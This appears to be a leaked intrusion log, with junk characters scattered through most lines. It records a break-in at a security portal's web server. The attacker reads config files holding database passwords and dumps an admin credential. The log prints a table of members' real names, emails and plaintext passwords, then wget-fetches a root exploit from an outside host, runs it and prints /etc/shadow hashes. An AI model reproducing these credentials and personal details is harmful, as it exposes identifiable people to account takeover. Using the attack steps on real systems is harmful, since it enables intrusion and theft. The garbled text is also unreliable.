8 Y$ ?4 Q& x. p5 F: g7 Bdrwxr-xr-x 7 astanet astanet 4096 Dec 22 14:16 链接标记astanet@astalavista.com
- N s L- Y6 m7 a) qdrwxrwxrwx 2 astanet astanet 4096 Jan 5 2006 backend9 {$ [8 Q( t# j; W
drwxr-xr-x 2 astanet astanet 4096 Oct 24 2006 banner; m, d; ]% d( J4 Y) F
-rw-r–r– 1 astanet astanet 25724 Apr 4 2006 banner.jpg
2 w/ m$ u8 q/ x' d& Fdrwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 config
. ~1 V6 p- @/ z; Udrwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 cron0 V' ?+ u1 `/ B9 Q0 n
drwxr-xr-x 11 astanet astanet 4096 Jan 5 2006 dvd
; S$ F: ?, \( c; i/ J4 T-rw-r–r– 1 astanet astanet 36 Jan 5 2006 error.php* v7 b A4 @0 o; w2 a% w
-rw-r–r– 1 astanet astanet 1406 Jan 5 2006 favicon.ico
5 y- L! X% w' c4 udrwxrwxrwx 2 astanet astanet 4096 Dec 15 2006 feed
" u4 w$ ]: F! r# M* L8 `5 ^drwxr-xr-x 3 astanet astanet 4096 Dec 8 2006 flashtour6 o# F1 d8 r- u9 i% _( M- N7 E
-rw-r–r– 1 astanet astanet 18 Jan 5 2006 htaccess
- N N3 n1 {; A7 L( _( B0 o-rw-r–r– 1 astanet astanet 585 Mar 24 14:50 .htaccess% V3 f; l# u8 r9 w) [+ O
-rw-r–r– 1 astanet astanet 398 Jan 5 2006 index1.php
" @/ D! o( i6 `8 ^) g3 |1 _-rw-r–r– 1 astanet astanet 1036 Jan 5 2006 _index.html
! W5 \$ H# v: Q. u9 B& Q, s-rw-r–r– 1 astanet astanet 6880 Dec 23 14:44 index.php: H0 T( L- S. ^- g
-rw-r–r– 1 astanet astanet 676 Mar 21 2006 index_redirect.php
. J* [* V7 ^! v; Q& T! s-rw-r–r– 1 astanet astanet 739 Feb 24 2006 index.swf0 ]9 X6 }7 U O, z
drwxr-xr-x 4 astanet astanet 4096 Oct 18 2006 irc. m- H# B1 u7 @
drwxr-xr-x 4 astanet astanet 4096 Aug 11 2006 lang( q9 d1 f# H+ G6 N' x* s1 i
drwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 lib: }: X+ J9 q, T5 t4 Y
drwxr-xr-x 6 astanet astanet 4096 Aug 11 2006 log
; @2 Q1 c. B& S# }. r! u* H5 Mdrwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 member, J) T: c: a7 Z6 v8 g" D
drwxrwxrwx 5 astanet astanet 4096 Jun 4 00:03 memberdata `1 z6 t( F. d4 n. p/ c) J' J
drwxr-xr-x 2 astanet astanet 4096 Jan 5 2006 new
; Y2 H" r8 u6 X4 D, F" y-rw-r–r– 1 astanet astanet 7219 Feb 24 2006 pix1.swf
2 k# M: a; [% w% ^drwxr-xr-x 2 astanet astanet 4096 Oct 27 2006 re
6 \+ N0 x1 d7 I2 l- i% |-rw-r–r– 1 astanet astanet 23 Jan 5 2006 robots.txt0 `( J7 W) i1 G) ]9 r/ D/ l
drwxr-xr-x 3 astanet astanet 4096 Aug 11 2006 rss( Q( j; x& }2 Z9 m& }
drwxr-xr-x 39 astanet astanet 4096 Dec 13 2007 sources9 C" z* e& I% W8 n, O0 I& y1 J
drwxrwxrwx 3 astanet astanet 4096 Feb 2 15:40 temp_com1 a/ u: c* [) z- w! M
drwxr-xr-x 7 astanet astanet 4096 Aug 11 2006 themes% {9 o4 b2 v9 b( j1 }9 B
drwxr-xr-x 2 astanet astanet 4096 Mar 14 2008 tmp_src7 R% I$ v/ a" H1 Z; _" ? q- j1 w
drwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 tpl
H4 [ m7 v0 c+ |& K; Adrwxr-xr-x 3 astanet astanet 4096 Sep 7 2006 v2
1 F1 c+ R \# v u' X. bdrwxr-xr-x 16 astanet astanet 4096 Jul 5 2006 v2_old5 f5 \" f `7 Q8 r' I
-rw-r–r– 1 astanet astanet 35 Dec 4 2006 webcash.php
6 Z, g) @: R0 a2 W+ Z6 E5 [+ Z; qdrwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 wiki
) U: v6 w% Z: g' i8 H+ m* w7 X
# x) S$ Q/ @( F& W0 wsh-3.2$ head -20 index.php
9 C" k$ ]7 _7 t1 s6 F" f; ]<?PHP
, u; r0 b, R; r0 y4 E/**( X7 F5 P) [& N* F
* Mainfile (external) for astalavistaNET v2.0$ c/ b# m3 g( k! \; w
*! L$ A5 N8 ^1 u( u' c
* @copyright Astalavista IT Engineering GmbH
9 |: E4 T ^1 `$ V# F& \! Y* @author Thomas Kaelin <链接标记thomas.kaelin@astalavista.ch>
5 N, c& i- _: W; P) W- l$ c* @version 1.0
: w2 C& e! @4 b( u*/
. l' o5 L" o3 O% h1 K/ H/ z+ u
- [5 _! M8 n) C( Q3 _ if ($_SERVER['PHP_SELF'] == ‘/webcash.php’) {
, Y% u& b- g" Y- I! _5 K& r $dontStartSession = false;( `' C0 t/ ~9 Z, `. v. s
} else {( \! A# s: c) {# }9 F' t! r
$dontStartSession = true;
b2 }( e' O( S, m" R }% Z4 T. }4 V1 E8 _, y
require_once($_SERVER['DOCUMENT_ROOT'].’/config/com.conf.php’);9 }2 b0 L: I* I8 A8 s; q7 g
require_once($_SERVER['DOCUMENT_ROOT'].’/config/ext.conf.php’);& L3 O4 H) m( N
require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’com.class.php’);/ e; |6 t9 {% F- i2 z
require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’ext.class.php’);- g' H7 v) a) V( M5 u: A
2 Z9 U3 k' Z$ r8 tsh-3.2$ cd config
: t8 S, F7 Q: Q2 t( Ush-3.2$ ls -la
3 r) _" N/ ]8 G3 n) stotal 32
( `& x8 l9 {4 }0 _' n% B% T8 vdrwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 .
1 C: b0 s5 p7 g5 U6 Ydrwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
5 {0 Z4 g, z3 h. L7 R; w-rw-r–r– 1 astanet astanet 987 Aug 11 2006 adm.conf.php
. \2 }2 J) V# h+ q8 ^6 @1 m! G3 L8 j-rw-r–r– 1 astanet astanet 4937 Dec 23 15:48 com.conf.php' s- }& _: \' l( n. t1 u
-rw-r–r– 1 astanet astanet 913 Aug 11 2006 cron.conf.php: b1 {- |9 l7 {( I3 h0 h# _. g0 Y0 `9 ~
-rw-r–r– 1 astanet astanet 1668 Aug 20 2008 ext.conf.php# q- D# K8 |9 @
-rw-r–r– 1 astanet astanet 2724 May 30 2007 int.conf.php
3 [* }- \4 q, n6 o8 N% ^: l: m9 z# e" O
sh-3.2$ cat com.conf.php% b" F$ {1 Z0 N+ p5 m0 l5 M% T
[snip]
# P0 x2 ^7 J2 r4 U+ X//member-database
! S4 A# c6 f+ a' c9 X$_CONFIG['db_mem_server'] = ‘localhost’;
( ]; z t7 H5 ~+ ?+ k$_CONFIG['db_mem_database'] = ‘astanet_membersystem’;
3 L- @" c$ V7 M$_CONFIG['db_mem_user'] = ‘astanet_db’;3 R( y4 t2 i5 ?' d1 I. g3 D0 g
$_CONFIG['db_mem_password'] = ‘TXwVrC7hbq’;
/ d/ X( _ e1 I; A$ Q' M$_CONFIG['db_mem_debug'] = false; //true or false
& Y2 a, s+ X3 b3 Q//ads-database
* o4 k" ^) Y. H; ]9 q$_CONFIG['db_ads_server'] = ‘localhost’;
( ]& x% k+ x; M$_CONFIG['db_ads_database'] = ‘astanet_ads’;+ p% ^2 a. {1 M/ ~& V
$_CONFIG['db_ads_user'] = ‘astanet_db’;
2 ]) C0 z m0 s# C$_CONFIG['db_ads_password'] = ‘TXwVrC7hbq’;/ N$ O" E0 q9 }
$_CONFIG['db_ads_debug'] = false; //true or false' F; {" y4 n, C6 o4 R$ D- U+ U
//rainbow-database- b" [) c" ^2 I9 M4 @: L. u m
$_CONFIG['db_rainbow_server'] = ‘212.254.194.163′;
% M4 p. I. p; }1 p& t; k$_CONFIG['db_rainbow_database'] = ‘rainbow’;
) W% P/ t1 P' D- _5 U/ V0 Z$_CONFIG['db_rainbow_user'] = ‘dinu’;9 ^$ M% w( f5 s9 i# Q$ m9 V
$_CONFIG['db_rainbow_password'] = ‘dinudinu’;+ ^% t( k. W1 Y B. v; i- X
$_CONFIG['db_rainbow_debug'] = false; //true or false
8 B! N- M7 ~$ K9 q//mailing lists database/ T, X, U; R7 u$ h" Y" U
$_CONFIG['db_mailing_lists_server'] = ‘localhost’;
* g6 w, O$ k, E# R5 `$_CONFIG['db_mailing_lists_database'] = ‘astanet_mailing_lists’;7 @% y6 A3 C% f$ i( c+ Y
$_CONFIG['db_mailing_lists_user'] = ‘astanet_db’;
, K, W1 o" g8 I" t" ~) J* ~* U$_CONFIG['db_mailing_lists_password'] = ‘TXwVrC7hbq’;
7 ^: D. G6 i. G4 L" i) w0 c$_CONFIG['db_mailing_lists_debug'] = false; //true or false. [1 c4 ]; _8 l, Y3 E
//paypal \+ R4 @% o# ^# }" {8 C, J: D
$_CONFIG['sub_pp_url'] = ‘链接标记[url]https://www.paypal.com/cgi-bin/webscr[/url]’; c# ]+ Z2 C% E9 ]* j5 ]. d
$_CONFIG['sub_pp_cmd'] = ‘_xclick’;
8 a' d% m6 a4 j `- R- Z+ _$_CONFIG['sub_pp_business'] = ‘链接标记info@astalavista.net’;
7 W& S1 E: j( I1 @% j; m7 Q% {$_CONFIG['sub_pp_noship'] = ‘1′;
, K3 X) g3 I# n2 p% g1 C$_CONFIG['sub_pp_referer'] = ‘链接标记[url]https://www.paypal.com/[/url]’;
6 m+ ?3 u* D, d[snip]! c. h% L* Q* s( z7 s9 C+ t$ A
% h: q) @/ D; h" I/ Dsh-3.2$ cd ..
/ }( ~7 B7 r- ~2 m qsh-3.2$ cd member8 D( \7 Z5 u3 }* Y2 R
sh-3.2$ ls -la3 v1 S( E% m5 t1 r0 g% Q
total 20
* U u1 B, B, A7 j" tdrwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 .$ h4 O3 z& |0 ~/ O- x
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..2 A% _6 s" }/ B7 [
-rw-r–r– 1 astanet astanet 19 Jan 13 14:02 .htaccess
' v/ h5 y% ?* C' d9 \7 @-rwxr-xr-x 1 astanet astanet 6709 Jan 13 14:06 index.php& D# c8 q1 Y3 e- V9 |- y; Q; l
sh-3.2$ cat .htaccess) x5 |# y( ?! b+ S' J F1 m
SecFilterEngine off
: ?% s; l1 B& F# d9 V
* d$ W# ~5 x" v- [1 csh-3.2$ cd ..
% }9 b' z( o& j3 E2 ?, Psh-3.2$ cd cron
! l- C# A, P$ S3 k/ \( p# n+ \sh-3.2$ ls -la
+ Z0 L2 S/ l2 F8 V) qtotal 168
" @* v3 j. | }' y. Z5 J% f3 N( \drwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 .
8 {6 Z$ ]) ? |; vdrwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..2 ^. _8 v5 n1 M' I% F* [& x
-rw-r–r– 1 astanet astanet 1272 Jan 12 08:24 0_corefile.php/ b+ a; A! T# R4 ^1 v4 i# C, V, X% ]1 O
-rw-r–r– 1 astanet astanet 2356 Aug 11 2006 0_functions.php8 I: l" r5 }2 J0 t
-rw-r–r– 1 astanet astanet 3616 Dec 23 15:44 1_daily.php
7 F! h6 Q( m3 N( k: M J- R-rw-r–r– 1 astanet astanet 527 Aug 11 2006 1_fivemin.php
& K3 Y7 g# o" g" K$ k2 a( ^4 b-rw-r–r– 1 astanet astanet 5006 Dec 23 15:39 1_hourly.php
3 U6 H% u, z8 u& \$ \1 F-rw-r–r– 1 astanet astanet 432 Aug 11 2006 1_weekly.php5 v5 Q4 Z6 k2 Z& I; V+ D
-rw-r–r– 1 astanet astanet 2277 Aug 11 2006 2_advertising.php; f$ `2 d2 P, s6 B \* u1 Y, G4 F' c
-rw-r–r– 1 astanet astanet 4882 Dec 23 15:40 2_archives.php
' ]# g4 c! Y; X% y2 l-rw-r–r– 1 astanet astanet 3784 Aug 16 2006 2_awstats.sh
- f2 H, m: D) H) `% g+ T0 J3 r-rw-r–r– 1 astanet astanet 14894 Jan 12 08:51 2_expire.bak.php R w! \3 G0 h' `- g( X7 Q$ P5 J
-rw-r–r– 1 astanet astanet 14979 Jan 12 09:10 2_expire.php4 Y; L% b; k: ^+ ]: ]# L0 l! z, w
-rw-r–r– 1 astanet astanet 7657 Aug 15 2006 2_exploitree_updater.php
% i+ `6 s+ a, r& Z- l-rw-r–r– 1 astanet astanet 686 Dec 23 16:31 2_filesize.sh
1 ^, N/ j. q+ g7 a4 v' I-rw-r–r– 1 astanet astanet 9853 Aug 11 2006 2_keywords_old.php6 `/ S1 Z; V, G9 I- A! O% D* j/ F
-rw-r–r– 1 astanet astanet 15664 Sep 22 2006 2_keywords.php
6 `/ q. w. T6 M O-rw-r–r– 1 astanet astanet 1233 Aug 11 2006 2_proxy_checker.php( V1 r2 A, W. U. z' k! m
-rw-r–r– 1 astanet astanet 7558 Aug 11 2006 2_proxy_collector.php
8 }: a% Y( `6 z2 p-rw-r–r– 1 astanet astanet 796 Aug 11 2006 99_create_emails.php3 h+ Z# M" z. f( U, J, G
drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 99_lang_email
, h" z; C+ r% B8 V-rw-r–r– 1 astanet astanet 9622 Jan 6 16:04 login_reminder.php
4 j9 E. f. e% k* R5 ?-rw-r–r– 1 astanet astanet 9620 Jan 6 16:05 login_reminder_test.php
# r* ^4 d) h* X4 \* O8 i% G4 t* R& u7 k% A2 ?
sh-3.2$ cd ..
/ T) o k) V A' |% {, osh-3.2$ cd _007
/ x# \- k/ h$ qsh-3.2$ ls -la
& I: h1 `; C3 z/ m. Qtotal 24
- c* A9 h8 C0 b/ Idrwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 .% \8 s- P8 C, v0 ^. V
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..4 t: a" U3 _5 t
-rw-r–r– 1 astanet astanet 96 Dec 23 15:17 .htaccess
0 j n$ E0 g/ x8 h$ z-rw-r–r– 1 astanet astanet 3263 Jan 15 2007 index.php' u* b. E" c1 L M4 I' O, O+ _
-rw-r–r– 1 astanet astanet 20 Dec 27 2006 info.php
% r5 Q$ T3 Q$ ]/ q$ M. F/ c: H T, mdrwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 sitemap; m) q4 f& j% \, Y0 t
$ ` K- l5 ?: |5 P/ c, Fsh-3.2$ cat .htaccess
- b6 Q T3 _1 P& |5 ?- jauthType Basic
3 V+ k, B1 X; u/ ?authName Admin9 @: `: O. n, ~ n
authUserFile /home/astanet/auth/.htadm_pwd7 c9 k. @. @5 z' E+ Z0 G
require valid-user6 N, ^6 b! H% G
/ t( |( i/ O3 k9 W0 p5 k
sh-3.2$ cat /home/astanet/auth/.htadm_pwd
0 y; q1 Y7 q( ^2 k2 e1 Vadmin2net:CR0bl65MwhfT
! g$ X6 z+ S( V" ?& I! ]% F
$ p2 y, l" s8 [# F" D9 K0 R- Ush-3.2$ mysql -u astanet_db -p8 Q; N9 e' j* }! _+ T
Enter password:0 I! K" {% m( t( F6 W- K
Welcome to the MySQL monitor. Commands end with ; or \g.! Z/ S5 b2 G8 ^% ^7 Z3 M
Your MySQL connection id is 275153- m* u! U3 N8 S$ `
Server version: 5.0.45-community-log MySQL Community Edition (GPL); d& n+ }4 q0 s4 \8 d
" h3 g* f, L! [% w2 aType ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer. y7 w# \ g% z
8 t9 C/ t8 U1 p' j! ?' p, I
mysql> show databases;
2 `2 o3 D0 w/ ^1 ]4 `4 w+———————–+- \1 i4 }2 Z" `+ |0 X/ f
| Database |4 c9 B; V' S; Z$ q8 Y
+———————–+4 W1 \" a( J J
| information_schema |
$ R* }; M* A6 }) s' o" ]1 M| astanet_ads |
- g+ B) \' K7 G. h. o) ^& L% L| astanet_mailing_lists |5 k" A) W8 p( j/ T2 l& t
| astanet_mediawiki |
% ^6 @. v! q( i| astanet_membersystem |
0 ~2 F" \- k1 `( G7 Y% S% }# x; x| test |
# t( n* o0 e: H8 ^6 e+———————–+7 f9 N) ?5 F6 ^
6 rows in set (0.00 sec). q, }+ _6 b, |% ?' E3 [5 N
4 h9 n/ w% p# q$ k3 ]. b% }$ ?mysql> use astanet_membersystem
1 Z* G1 k3 {5 ?; n* ZDatabase changed
. Z9 V7 o i/ V: E2 G3 Q5 o' Zmysql> show tables;
4 T( v! v+ F6 _, H+———————————–+) Z y+ Z. O' s H
| Tables_in_astanet_membersystem |
/ ^$ M7 E# X& W4 }3 ^6 J, W9 b4 ^+———————————–+* H$ D' d# Y0 i+ F2 U
| blacklist_categories |
3 C f) V1 J Y& \| blacklist_content |3 J4 v, i0 Y0 J. P" _$ ?3 g' A
| blacklist_levels |. X8 [+ U+ n2 C
| blacklist_mcset |
, O% u7 O Y8 p5 N: }7 ]| dir_categories |+ {, i0 S9 Q! |6 q0 D) W1 v. w
| dir_comments |3 j) t/ S# P) f: n) A1 g
| dir_links |0 x& t7 G) D2 c6 ? n8 C
| dir_temp |
4 x6 b8 v" h) p* b$ x| dir_votes |
4 }+ n; L+ x" U' W2 n$ e: b! L2 F| documents |
6 x* G( a$ ~( X3 v# ]3 p| documents_categories |' {2 ^2 Y0 Z5 r
| email_content |
7 j* Q) N3 {# M! k+ Z| email_settings |
: l) H2 n" {7 l" o$ C" \( z| exploits |2 m2 E" _4 k! K# c( a5 S
| exploits_categories |
! L* x R$ s4 D$ {| exploittree_categories |% `- ?" D3 b. c( a# s" z0 j* u
| exploittree_exploits |
4 b7 k7 |/ w# [( ]& V) n+ }! I| home_values |
$ y- ]7 p1 } U: h| iso_countries |
6 X+ f4 k! I4 R/ n| links_categories |0 j( A. g* x8 X% T6 R7 v
| links_records |
- B* F4 C8 c7 ~" S: T| links_unauth |
* g5 ^% ]$ V8 \0 o| links_votes |
4 P4 }9 @9 b; z; U2 s) X: q| log |" f8 F2 [8 ~0 ~$ f/ D9 I3 Z* \
| news_categories |, _% A, ~0 E0 A3 x. ]8 P v9 N
| news_comments |
9 u6 i# L: Q6 K, E| news_emoticons |
) L/ ] I i1 Z' U0 t. N+ B/ T. I| news_latest |
, \4 x: T. ^1 d$ s) h2 || news_messages |
8 R; K) _; R8 L. c4 y8 || news_statistics |
- h$ o4 P$ k! H| news_votes |8 i% }' S% o7 T
| prices_content |1 h' t4 b% `0 D3 r6 @$ i
| prices_offers |; F2 f% t1 o. w- {! U, N8 {
| rss_settings |
, W* W0 Q2 f3 Y: K| sessions |
+ Z2 p/ E' S5 S9 ^! C+ o( A! Q# g| stats_signups |) O; H% o- H# n
| u2u2 |, j% J: y& } Q
| u2u_contact |) X" d2 _+ A, @5 C% n
| u2u_settings |
& u! }, ^. b! v| user_keywords_selected_categories |
+ Z. M t8 b( Q9 ?: x| users |! l- C7 |! V% V7 _6 b
| users_ipn_test |
5 }6 A* ~8 e2 _' ^$ N# `| users_keyword_values |
/ ^' W$ S% h6 P3 k$ S| users_profile |5 l6 S E; q6 U1 m2 G2 K D& K5 M
| users_temp |6 k! b4 }. s) I4 c
| users_upgrade |: E9 R" @& B5 x
+———————————–+
. ]6 n% x* x. D46 rows in set (0.00 sec)
, |( S, H$ u# R& }9 C9 }' d7 z! [, X
mysql> describe users;. W3 k* [6 r: O& \% T
+————————–+————————————–+——+—–+———————+—————-+
2 O, T9 ^" b" ~9 g| Field | Type | Null | Key | Default | Extra |8 B' G" x) ]% }- X. M
+————————–+————————————–+——+—–+———————+—————-+1 e3 a6 S' N& [0 O4 y$ ]( z
| primary_key | smallint(5) unsigned | NO | PRI | NULL | auto_increment |
0 M1 n5 H5 R8 @| user | varchar(50) | NO | | | |
g, c9 t& b2 F% S9 _; O1 ^| nickname | varchar(30) | NO | MUL | anonymous | |
( |/ m- R: g+ \* W: d5 j. e. }/ ]| password | varchar(30) | NO | | | |& ` m8 p# d/ B, x2 X- K/ B8 z6 Q
| userlevel | tinyint(3) | YES | MUL | NULL | |; d( w& N0 L6 u2 r$ U y: v2 ]/ t) a
| exp | int(8) unsigned | NO | | 0 | |
6 p' A* k1 W p$ z$ I9 \0 @| email | varchar(50) | NO | | | |5 Q; u# f! i9 [& M6 C
| ip | varchar(15) | NO | | 0 | |
& K9 N" A) i) o| proxy | set(’0′,’1′) | NO | | 0 | |
/ P4 H) e. s0 h| logtime | timestamp | NO | | CURRENT_TIMESTAMP | |
# q0 ~& s' z e$ k| login_reminder_last_sent | timestamp | NO | | 0000-00-00 00:00:00 | |- C' U3 @' y4 s1 w) M& u! f
| anz_in | tinyint(1) | NO | | -1 | |' O1 Q/ m5 Z! M# k
| status | tinyint(1) unsigned | NO | | 0 | |
" d2 O& a9 G ]" z" z" Z| checked | set(’0′,’1′,’2′) | NO | | 0 | |+ ]1 d) V) A% v7 N
| freemember | set(’0′,’1′) | NO | | 0 | |$ `* L. N% Z9 f/ S, H
| ordertype | set(’transfer’,'wp’,'pp’,'mc’,'CnB’) | YES | | NULL | |
$ D( I0 H2 k2 R- j8 y; e( Q| lang | tinytext | NO | | | |8 N. \2 z! d; m6 M* C
| adid | smallint(6) | NO | | 0 | |2 y/ D% j) a, F
| pp_txn_id | varchar(255) | YES | | NULL | |" y B7 l' {5 y [- @, d" Y0 {
| cnb_transaction_id | varchar(255) | YES | | NULL | |
0 ?! M: B! z" ~| cnb_order_id | varchar(255) | YES | | NULL | |
+ X: G, ~1 D2 p' a/ T6 E3 t| cnb_user_id | int(11) | YES | | 0 | |; |* y4 D! b: k" T
+————————–+————————————–+——+—–+———————+—————-+! f5 M6 S# W/ L8 k% y; y! N
22 rows in set (0.01 sec)5 d P" l. S" y
0 H& Y, `5 U$ W( ^' {. x
mysql> select count(*) as skids from users;
! E! ~' m! n8 V+ k2 d) f+——-+8 s$ r R: {; O% F6 r* Z
| skids |5 ^- p, v- G3 m# }
+——-+3 Q; |) w2 d G1 e+ A& o
| 25199 | \) j- g9 P. O8 n1 X
+——-+$ D. K* h1 d0 [# W2 ]" Z
1 row in set (0.00 sec)' D1 D; E. L4 ^7 J
2 j; @# v/ X$ Y$ S
mysql> select user,nickname,password,email from users where userlevel = 1;! L; T$ _- H5 o* u8 \6 Y0 o0 D
+————————–+———————-+——————+———————————–+7 ^# _( u# |1 d$ t
| user | nickname | password | email |& r+ n' M+ [! Y! x6 p9 o3 o
+————————–+———————-+——————+———————————–+" R$ P/ K" f f9 O0 I! w
| pascal | prozac | astaman3 | 链接标记info@astalavista.net |
0 L! q% ]- {& L H5 M/ \, r# x| Ivan Schmid | rOOtless1 | astalavista4asta | 链接标记ivan.schmid@comvation.com |9 V; k$ W6 E% f) {/ Q
| qreymer | Palermo | qblsw85iam | 链接标记eche@home.se |
) W1 ]% r" u, s| Christian Wehrli | g0atherd | hitt?74 | 链接标记g0atherd@gmx.net |# F/ P, e2 \5 A9 i! @% [1 v
| Andrew Blake | Minky | liq73uid | 链接标记a.blake@har.mrc.ac.uk |
: v( s6 J# z6 V; N6 ^1 l6 T| Martin Wyss | dinu | kj63;cXy | 链接标记martin.wyss@astalavista.net |' o$ Y# F% M* J. k( q
| Leandro Nery | Timan_no_Sanco | nery2002 | 链接标记leandronery@hotmail.com |
6 e# ~+ P4 J6 }- I6 i, o: N$ z| shaving ryans privates | ShavingRyansPrivates | memberboard313 | 链接标记shavingryansprivates1@hotmail.com | K5 [, N1 m8 `$ |* [" X# [& W
| Gerben van der Lubbe | Spoofed Existence | Lb59eXg5 | 链接标记spoofedexistence@hotmail.com |
3 [3 q5 b# y X| David M Lee | Daremo | icG12m03 | 链接标记daremo@hackerheaven.com |/ X9 t9 ]3 { z' f, w
| David Corn | akriel | ve3uB$cUku | 链接标记akriel@fallenroot.net |* o* G7 B9 |2 {& \0 Z \) ]; L, G
| Thomas Kalin | Gwanun | QwErTy123 | 链接标记thomas.kaelin@astalavista.net |
1 X! @+ m' b6 X8 Y| Marcus unknown | Cra58cker | hhCr4ck06 | 链接标记unknownmarcus@hotmail.com |% i$ x! z' l& l% _" n; K3 L* E
| David Ellis | dellis203 | philip | 链接标记dellis@nightwatchnss.com |; ]/ |/ a+ R @0 C! K; W6 y
| Lars Christian Solberg | xeor | tF3s4|Nea | 链接标记xeor@hush.com |8 o; H( H8 _) M [/ e
| Paulo Santos | Be1er0ph0r1 | amor01 | 链接标记pmsantos@gmx.ch |! _, u+ q# N, u' \& D
| Thomas D?ppen | daha | asta4tom | 链接标记thomas.daeppen@astalavista.ch |
0 G7 }5 f7 g4 z. Z| Touraj Abbasi Moghaddasi | -Crow1 | NetR0ck | 链接标记toraj.a.m@gmail.com |' s5 w7 L5 \! N- Y7 R! ^5 M7 X
| Fabius Bernet | traviser | wellenreiter100 | 链接标记fabius.bernet@astalavista.ch |1 I# l U' C3 W4 y' ~( m: z
| Zachary McElroy | duder1 | dirty245dix | 链接标记mcelroyzj@yahoo.com |
( C( H9 P9 F* g% N6 B9 w| Leron Cohen | cohen2 | leron4free | 链接标记leron@quiredmedia.com |
1 a, l0 L: W) M9 e+ D, T| Beatriz Pontes | anonymous1656 | pitas | 链接标记joao.pedro.pontes@gmail.com |
0 Y, P+ a2 P- j2 M. f| Glafkos Charalambous | anonymous2086 | si99490178$# | 链接标记nowayout@webhostline.com |: h# x. Q5 { x m
| developer COMVATION | anonymous2402 | Ri?Q$Q$MVU | 链接标记ivan.schmid@astalavista.ch |
4 K" J" Z- S: Q, A$ ^- a| Peter Fisher | cyph3r1 | testZer025435 | 链接标记cyph3r@astalavista.com |: f x1 p" E% ]0 H. C) I' w2 G
| sykadul | sykadul | ak29eral | 链接标记sykadul@gmail.com |
1 T& S* I7 M5 }0 S% O1 M: F| Ronny Janzi | commander1 | mpbdaagf6m | 链接标记ronny.janzi@astalavista.ch |
2 q, t6 c" l* }* J+————————–+———————-+——————+———————————–+
4 J% q7 j: M& S27 rows in set (0.00 sec)7 |; C% R% m% g% c
2 O. b; p- G/ Q) b
mysql> exit;
' ^4 n) b3 [! H( GBye
6 s6 w: s4 f2 F# L3 }
' P" B; k8 H4 G- [[~] plaintext passwords? yes,
' q7 u1 C! o4 FThose so called “security professionals” who charge you $6.66 / month to7 X6 ~. U9 b k' d9 b& y. M
register at their hack-proof portal, save your passwords in plaintext…
# B0 u9 A4 U8 o& X! |brilliant!
7 S0 \/ q; n, X: @( Y/ ~
$ V& f0 j' c! h[~] This been fun but we want more.& o# I/ E( \) {# U3 [
9 y$ Y1 E- {& w/ t6 c+ m. a
sh-3.2$ uname -a* x) A3 t1 S# f) d1 K/ W" i& _
Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
I2 _7 B" M" H* `/ Ksh-3.2$ wget 链接标记[url]http://anti.sec.labs/g0troot[/url]* o6 W6 j" x: H4 M3 }8 p
–13:33:37– 链接标记[url]http://anti.sec.labs/g0troot[/url]) \1 h! l# c1 s9 x: @9 X
Resolving anti.sec.labs… 13.33.33.37
! p6 N( ]4 C5 O( @# ] _Connecting to anti.sec.labs|13.33.33.37|:80… connected.7 w5 j# N a# D; s, `; A! [
HTTP request sent, awaiting response… 200 OK( e2 u, r/ c6 W0 H
Length: 18200 (18K) [text/plain]
! ?) L5 o) ~+ [2 o3 X: bSaving to: `g0troot’
$ ?; T' w) z1 j' s1 ~0 B' Z1 |. Q# \7 E
100%[=========================================================================================================================================>] 18,200 58.6K/s in/ d4 S6 p U- C
0.3s
7 R5 m3 ]% j; B% M) s0 m: `# j$ u8 R
; M+ Z# g- N: `4 K8 M18:55:14 (58.6 KB/s) - `g0troot’ saved [18200/18200]
& }. P% M. ^3 h/ Z
4 U8 B* C6 S9 R" V8 j dsh-3.2$ ./g0troot -i x86_64% u. o, ]' x7 f) p3 d6 j5 n
[+] g0troot - anti.sec.labs# D' N2 P0 I q, y
[+] Target: 2.6.18-128.1.10.el5
- w. L/ [ T& Q: L* T+ I[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]$ G- \ q: M/ H) R. @* G+ N. R4 G+ t! R
: ~( s: t$ o \3 \& L& A9 ^) z |[+] r00tr00t
0 |2 a3 I% z/ r[~] Executing shell…% c* J1 j6 V5 { l( e/ G0 c6 h( \
& ~6 {3 N5 }( `3 j
sh-3.2# id. ^+ [ N$ k5 A3 ^8 ~
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel), y; r. H2 r- r. z2 j/ i
- \2 r# ]5 P& q6 r
sh-3.2# cat /etc/shadow( C7 z2 q. [+ w
root 1$P/3ZMAgv$E9B4mX02s1Xrimj46V602.:14015:0:99999:7:::. O4 Q) a, |2 t+ @( p3 H
[snip]
, V+ p, E/ n6 t* U# U+ {admin1$sbycsEGo$d81laShnxFiziFaQMH32F.:13770:0:99999:7:::+ e* y4 E- |9 p9 h [# i2 f$ Y! O# d' \
jon1$5yHxRLX.$8pZs0cQLNh5uFCK3m4st1.:13777:0:99999:7:::
4 V9 g$ o4 b# _com1$jEZ62nri$aDTj.1REsrYePcPBdfOQz1:13780:0:99999:7:::
! N( W. D) X7 w( m5 X) B* I. D$ Q* s" Wastanet1$YniJLAr.$NKtPNNGK9mcmz3/mLMSWC1:14235:0:99999:7:::
# j, U4 r' H' L7 i/ J. v
2 C# o, I. V) V& {* F/ fsh-3.2# cat /etc/motd1 m! u% u7 ]" k
#####################################################
